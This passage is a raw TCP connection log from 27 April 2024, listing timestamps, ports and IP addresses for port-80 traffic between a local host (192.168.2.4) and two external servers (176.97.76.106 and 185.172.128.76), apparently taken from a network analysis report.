Apr 27, 2024 02:19:05.357059956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.357142925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.357234001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.357321978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.411770105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.411822081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.411864042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.411904097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.411938906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.412028074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.498318911 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:05.498320103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:05.550509930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.550569057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.550611973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.550633907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.550714016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.550733089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.550750017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.550753117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.550795078 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.550981045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.550998926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.551038980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.551181078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.551224947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.551242113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.551259041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.551307917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.551395893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.551481962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.551500082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.551538944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.551728010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.551744938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.551795006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.607007980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.607050896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.607096910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.607132912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.607243061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.607286930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.669070005 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:05.669090033 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:05.669142008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:05.669250965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:05.669266939 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:05.669328928 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:05.745527983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.745836973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.745853901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.745871067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.745877028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.745896101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.745917082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.745975971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.745987892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.746022940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.746054888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.746054888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.746120930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.746257067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.746304035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.746314049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.746356010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.746423006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.746434927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.746489048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.746522903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.746536970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.746598005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.746639967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.802448034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.802524090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.802573919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.802599907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.802644968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.802742004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.940207005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.940227032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.940304041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.940313101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.940323114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.940361977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.940378904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.940387011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.940427065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.940440893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.940474987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.940491915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.940514088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.940526962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.940558910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.940562963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.940582991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.940668106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.940669060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.940685987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.940718889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.940727949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.940737009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.940781116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.996634007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.996711969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.996757984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:05.996803045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.996870995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:05.996926069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.138648033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.138910055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.138927937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.138993025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.138993025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.139087915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.139113903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.139136076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.139148951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.139163017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.139189005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.139216900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.139260054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.139269114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.139306068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.139314890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.139332056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.139359951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.139364004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.139394045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.139414072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.139421940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.139440060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.139461994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.139487982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.191534996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.191581964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.191625118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.191641092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.193109035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.272545099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.272627115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.275603056 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.335237980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.335306883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.335398912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.335405111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.335432053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.335505962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.335510015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.335525036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.335562944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.335582972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.335593939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.335627079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.335661888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.335716009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.335752964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.335777044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.335814953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.389503002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.389692068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.445740938 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.531662941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.531725883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.531769037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.531780958 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.531809092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.531848907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.531877041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.531888962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.531928062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.531933069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.531949043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.532001019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.532017946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.532098055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.532154083 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.532181025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.532201052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.532286882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.554441929 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.554462910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.554521084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.554521084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.554594994 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.554615021 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.554635048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.554653883 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.554653883 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.554663897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.554682016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.554699898 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.554706097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.554727077 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.554755926 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.554764032 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.554785967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.554809093 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.584443092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.584462881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.584507942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.584518909 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.637061119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.726161003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.726231098 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.726248980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.726450920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.726495981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.726505995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.726566076 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.726619959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.726728916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.726773024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.726794004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.726846933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.726902008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.726998091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.727068901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.727113008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.727155924 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.727235079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.727250099 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.727318048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.727376938 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.727425098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.727473974 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.727489948 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.727544069 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.727579117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.727663994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.727731943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.727746010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.727847099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.727919102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.727920055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.727978945 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.728049994 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.777667046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.779360056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.779383898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.779522896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.831890106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.887052059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.897622108 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.897700071 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.898449898 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.898515940 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.898545027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.898595095 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.898689032 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.898746014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.898747921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.898816109 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.898902893 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.898951054 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.898957968 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.898993969 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.899308920 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.899348974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:06.899370909 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.899394989 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:06.921149969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.921169043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.921312094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.921494961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.921540022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.921557903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.921576023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.921590090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.921600103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.921617985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.921720028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.921736956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.921776056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.922019958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.922038078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.922070980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.922245979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.922297955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.922319889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.965162992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:06.973740101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.975502968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.975550890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:06.975578070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.027668953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.069412947 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.070142031 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.070394993 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.070415974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.070453882 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.070487022 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.070691109 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.070754051 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.070781946 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.070811987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.071044922 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.071063042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.071119070 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.071527958 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.071590900 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.082917929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.082997084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.083046913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.116293907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.116441965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.116512060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.116725922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.116806030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.116854906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.116858959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.116873980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.116899014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.116916895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.116997004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.116997004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.117016077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.117022038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.117036104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.117053986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.117075920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.117204905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.160181999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.170883894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.170903921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.170943975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.215179920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:07.221925974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:07.241204023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.241354942 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.241405010 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.241446018 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:07.241460085 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:07.241477013 CEST	49733	80	192.168.2.4	185.172.128.76
